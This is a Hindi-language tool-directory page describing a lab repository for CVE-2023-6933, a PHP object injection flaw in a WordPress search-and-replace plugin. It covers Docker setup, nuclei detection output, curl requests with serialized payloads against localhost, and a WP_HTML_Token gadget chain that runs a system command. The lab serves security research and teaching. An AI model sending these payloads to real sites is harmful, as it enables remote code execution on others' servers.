Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
vulnerable-bsr-lab-CVE-2023-6933 — CVE-2023-6933 के लिए व्यावहारिक प्रयोगशाला, Better Search Replace WordPress प्लगइन में PHP ऑब्जेक्ट इंजेक्शन भेद्यता, Docker परिनियोजन, nuclei टेम्पलेट और सुरक्षा अनुसंधान और शिक्षा के लिए एक्सप्लॉइट स्क्रिप्ट के साथ। | Kitploit
उपकरण/GitHubGitHub/trex96/vulnerable-bsr-lab-cve-2023-6933
शोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubtrex96/vulnerable-bsr-lab-cve-2023-6933

vulnerable-bsr-lab-CVE-2023-6933

CVE-2023-6933 के लिए व्यावहारिक प्रयोगशाला, Better Search Replace WordPress प्लगइन में PHP ऑब्जेक्ट इंजेक्शन भेद्यता, Docker परिनियोजन, nuclei टेम्पलेट और सुरक्षा अनुसंधान और शिक्षा के लिए एक्सप्लॉइट स्क्रिप्ट के साथ।

रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-6933 भेद्यता प्रयोगशाला

अवलोकन

यह प्रयोगशाला वातावरण CVE-2023-6933 का प्रदर्शन करता है, जो Better Search Replace WordPress प्लगइन संस्करण ≤1.4.4 में एक गंभीर PHP ऑब्जेक्ट इंजेक्शन भेद्यता है।

भेद्यता विवरण

  • CVE ID: CVE-2023-6933
  • CVSS स्कोर: 9.8 (गंभीर)
  • प्रभावित प्लगइन: Better Search Replace ≤1.4.4
  • भेद्यता प्रकार: अविश्वसनीय उपयोगकर्ता इनपुट के माध्यम से PHP ऑब्जेक्ट इंजेक्शन
  • हमला वेक्टर: AJAX एंडपॉइंट /wp-admin/admin-ajax.php क्रिया search_replace_db के साथ

त्वरित प्रारंभ

1. प्रयोगशाला तैनात करें

# Clone the repository
git clone https://github.com/Trex96/vulnerable-bsr-lab-CVE-2023-6933.git
cd vulnerable-bsr-lab-CVE-2023-6933

# Deploy using Docker Hub image (automatic pull)
docker-compose up -d

प्रयोगशाला स्वचालित रूप से:

  • Docker Hub से भेद्य WordPress इमेज खींचता है (trex999/vulnerable-bsr-lab:latest)
  • WordPress को MySQL और phpMyAdmin के साथ सेट करता है
  • भेद्य Better Search Replace प्लगइन (v1.4.4) स्थापित और सक्रिय करता है
  • स्थापना ~60 सेकंड में पूरी करता है

2. वातावरण तक पहुँचें

  • WordPress: http://localhost:8080
  • एडमिन पैनल: http://localhost:8080/wp-admin (admin/admin123)
  • phpMyAdmin: http://localhost:8081 (root/rootpassword)

3. भेद्यता का परीक्षण करें

# Run the automated POC
nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v

# Manual testing via curl
curl -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d 'action=search_replace_db&search_for=O:8:"stdClass":1:{s:6:"marker";s:34:"nuclei_test_payload_demonstration";}&replace_with=test'

सफल POC निष्पादन

$ nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v

[CVE-2023-6933:plugin_version] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["trunk"]
[CVE-2023-6933:tested_up_to] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["6.4"]
[CVE-2023-6933:response_content] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]
[CVE-2023-6933:poc_verification] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]

[INF] Scan completed in 67ms. 4 matches found.

POC सफलतापूर्वक:

  • ✅ भेद्य प्लगइन संस्करण का पता लगाता है
  • ✅ प्रतिक्रिया विश्लेषण के माध्यम से ऑब्जेक्ट इंजेक्शन क्षमता की पुष्टि करता है
  • ✅ त्रुटि पर निर्भरता के बिना कार्यात्मक भेद्यता का प्रदर्शन करता है
  • ✅ सफल डिसीरियलाइज़ेशन का व्यवहारिक सत्यापन प्रदान करता है

तकनीकी विश्लेषण

भेद्यता

Better Search Replace प्लगइन में इसके AJAX हैंडलर में एक PHP ऑब्जेक्ट इंजेक्शन भेद्यता है। भेद्यता तब होती है जब:

  1. उपयोगकर्ता इनपुट POST के माध्यम से search_for पैरामीटर को /wp-admin/admin-ajax.php पर भेजा जाता है
  2. क्रिया search_replace_db पर सेट की जाती है
  3. इनपुट में सीरियलाइज़्ड PHP ऑब्जेक्ट होते हैं जो उचित सत्यापन के बिना अनसीरियलाइज़ किए जाते हैं
  4. यह मनमानी ऑब्जेक्ट इंस्टेंसिएशन और संभावित कोड निष्पादन की अनुमति देता है

POC सत्यापन विधियाँ

हमारा nuclei टेम्पलेट कई सत्यापन चरणों के माध्यम से भेद्यता प्रदर्शित करता है:

  1. प्लगइन पहचान: भेद्य प्लगइन संस्करण की उपस्थिति की पुष्टि करता है
  2. ऑब्जेक्ट इंजेक्शन परीक्षण: सीरियलाइज़्ड पेलोड भेजता है और प्रतिक्रियाओं का विश्लेषण करता है
  3. व्यवहारिक सत्यापन: सफल ऑब्जेक्ट डिसीरियलाइज़ेशन प्रसंस्करण की पुष्टि करता है

इस प्रयोगशाला की प्रमुख विशेषताएँ

  • कोई त्रुटि निर्भरता नहीं: POC त्रुटि संदेशों के बजाय व्यवहार विश्लेषण के माध्यम से वास्तविक भेद्यता प्रदर्शित करता है
  • कार्यात्मक परीक्षण: सिस्टम को नुकसान पहुँचाए बिना डिसीरियलाइज़ेशन को सत्यापित करने के लिए सुरक्षित सीरियलाइज़्ड ऑब्जेक्ट का उपयोग करता है
  • स्वचालित तैनाती: शून्य मैन्युअल कॉन्फ़िगरेशन के साथ पूर्ण प्रयोगशाला सेटअप
  • एकाधिक परीक्षण विधियाँ: स्वचालित nuclei टेम्पलेट और मैन्युअल curl कमांड दोनों

दस्तावेज़ीकरण

त्वरित संदर्भ

  • README.md: यह फ़ाइल - त्वरित प्रारंभ और अवलोकन
  • CVE-2023-6933_POC_DOCUMENTATION.md: विस्तृत PoC विश्लेषण के साथ पूर्ण तकनीकी दस्तावेज़ीकरण
  • POC_TEMPLATE_SUMMARY.md: आवश्यकताओं का अनुपालन और वितरण पुष्टि

पेशेवर PoC टेम्पलेट

nuclei टेम्पलेट (nuclei-templates/cve-2023-6933.yaml) पेशेवर रूप से संरचित है:

  • अत्यधिक टिप्पणियों के बिना स्वच्छ कोड
  • अलग-अलग फ़ाइलों में व्यापक तकनीकी दस्तावेज़ीकरण
  • उत्पादन-तैयार टेम्पलेट प्रारूप
  • सुरक्षा अनुसंधान मानकों के साथ पूर्ण अनुपालन

परीक्षण परिणाम

सफल POC निष्पादन

$ nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v

[CVE-2023-6933:plugin_version] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["trunk"]
[CVE-2023-6933:tested_up_to] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["6.4"]
[CVE-2023-6933:response_content] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]
[CVE-2023-6933:poc_verification] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]

[INF] Scan completed in 67ms. 4 matches found.

POC सफलतापूर्वक:

  • ✅ भेद्य प्लगइन संस्करण का पता लगाता है
  • ✅ प्रतिक्रिया विश्लेषण के माध्यम से ऑब्जेक्ट इंजेक्शन क्षमता की पुष्टि करता है
  • ✅ त्रुटि पर निर्भरता के बिना कार्यात्मक भेद्यता का प्रदर्शन करता है
  • ✅ सफल डिसीरियलाइज़ेशन का व्यवहारिक सत्यापन प्रदान करता है

सुरक्षा सूचना

⚠️ चेतावनी: इस वातावरण में जानबूझकर भेद्य सॉफ़्टवेयर है। केवल पृथक परीक्षण वातावरण में उपयोग करें। उत्पादन या इंटरनेट-सुलभ प्रणालियों पर तैनात न करें।

सफाई

docker-compose down -v

सन्दर्भ

  • CVE-2023-6933 विवरण
  • Better Search Replace प्लगइन
  • PHP ऑब्जेक्ट इंजेक्शन दस्तावेज़ीकरण

शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए बनाया गया

Docker वातावरण (Docker_LAB_SETUP/)

  • WordPress 6.4.0 भेद्य Better Search Replace 1.4.3 के साथ
  • MySQL 8.0 डेटाबेस सर्वर
  • डेटाबेस प्रबंधन के लिए phpMyAdmin
  • पूर्व-कॉन्फ़िगर्ड भेद्य वातावरण

शोषण स्क्रिप्ट्स

  • cve_2023_6933_exploit.php - व्यापक PHP शोषण टूलकिट
  • wp_html_token_poc.php - WordPress 6.4.0+ RCE प्रदर्शन
  • bsr_direct_exploit.php - प्रत्यक्ष भेद्यता परीक्षण

पहचान उपकरण

  • nuclei-templates/cve-2023-6933.yaml - उन्नत nuclei टेम्पलेट
  • manual-test.sh - व्यापक मैन्युअल परीक्षण स्क्रिप्ट

🎯 उचित शोषण कार्यप्रणाली

यह प्रयोगशाला भेद्यता अनुसंधान के लिए सर्वोत्तम प्रथाओं का पालन करते हुए गैर-त्रुटि-आधारित पहचान प्रदर्शित करती है:

1. सफलता-आधारित पहचान

HTTP 500 त्रुटियों पर निर्भर होने के बजाय, हमारे उपकरण पता लगाते हैं:

  • सफल पेलोड प्रसंस्करण
  • सीरियलाइज़्ड ऑब्जेक्ट डिसीरियलाइज़ेशन
  • अनुप्रयोग प्रतिक्रिया पैटर्न
  • कार्यात्मक शोषण साक्ष्य

2. WP_HTML_Token RCE श्रृंखला

वास्तविक RCE के लिए WordPress 6.4.0+ WP_HTML_Token वर्ग का उपयोग:

O:13:"WP_HTML_Token":4:{
    s:13:"bookmark_name";s:14:"touch /tmp/rce";
    s:9:"node_name";s:8:"testnode";
    s:21:"has_self_closing_flag";b:0;
    s:10:"on_destroy";s:6:"system";
}

3. एकाधिक हमला वेक्टर

  • AJAX एंडपॉइंट शोषण (admin-ajax.php)
  • प्रत्यक्ष प्लगइन इंटरफ़ेस हेरफेर
  • खोज/प्रतिस्थापन संचालन के माध्यम से डेटाबेस इंजेक्शन

🔬 परीक्षण दृष्टिकोण

मैन्युअल परीक्षण

# Test basic plugin presence
curl "http://localhost:8080/wp-content/plugins/better-search-replace/readme.txt"

# Test vulnerability with safe payload
curl -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
  -d "action=bsr_search_replace&search_for=O:8:\"stdClass\":1:{s:4:\"test\";s:8:\"nuclei\";}&replace_with=safe&select_tables[]=wp_posts&dry_run=1"

Nuclei टेम्पलेट विशेषताएँ

  • मल्टी-वेक्टर परीक्षण: 5 विभिन्न HTTP अनुरोध
  • सफलता-आधारित मिलानकर्ता: त्रुटियों के बजाय कार्यात्मक प्रसंस्करण की तलाश करता है
  • व्यापक निष्कर्षण: संस्करण पहचान, प्रतिक्रिया विश्लेषण
  • सुरक्षित पेलोड: गैर-विनाशकारी परीक्षण दृष्टिकोण
टूल डाउनलोड करें